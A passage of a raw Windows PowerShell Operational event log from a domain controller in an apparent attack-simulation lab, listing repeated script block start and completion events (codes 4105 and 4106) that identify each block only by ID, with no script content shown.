Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469526
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469525
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469524
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469523
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469522
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469521
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469520
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469519
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469518
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469517
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469516
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469515
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469514
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469513
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469512
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469511
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469510
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469509
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469508
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469507
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469506
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469505
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469504
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469503
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469502
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469501
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469500
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469499
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469498
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469497
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469496
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469495
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469494
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469493
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469492
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469491
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469490
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469489
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469488
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469487
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469486
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469485
Keywords=None
Message=Started invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469484
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469483
Keywords=None
Message=Started invocation of ScriptBlock ID: 1de8db71-a909-4c55-9296-b2f0c71f579b
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469482
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469481
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469480
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469479
Keywords=None
Message=Completed invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469478
Keywords=None
Message=Started invocation of ScriptBlock ID: 343ee787-8ffa-44cd-ace2-0363ce6b4460
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469477
Keywords=None
Message=Started invocation of ScriptBlock ID: 1e147caa-34cc-4124-87f7-0a2679af79a9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469476
Keywords=None
Message=Completed invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469475
Keywords=None
Message=Started invocation of ScriptBlock ID: b2eb694c-eb34-4333-84e2-ab9d54020287
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469474
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469473
Keywords=None
Message=Started invocation of ScriptBlock ID: 5a6b2030-4af5-4510-9826-38fb11344c6a
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1469472
Keywords=None
Message=Completed invocation of ScriptBlock ID: caef7938-659e-4003-b429-9acff51ff743
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:01:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1469471
Keywords=None
